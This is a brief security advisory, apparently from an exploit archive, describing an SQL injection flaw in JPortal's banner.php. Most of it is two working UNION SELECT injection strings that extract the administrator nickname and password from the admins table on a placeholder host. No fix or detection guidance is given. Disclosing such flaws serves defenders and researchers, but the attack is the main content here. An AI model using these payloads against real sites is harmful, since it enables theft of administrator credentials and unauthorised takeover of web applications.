|
JPortal Banner.PHP SQL Injection Vulnerability
No exploit is required. The following demonstrates the steps necessary to obtain the administrator login id and password: go to http://www.example.com/jportal/banner.php and try this: ' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 and then: ' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 |
|
 Privacy Statement |
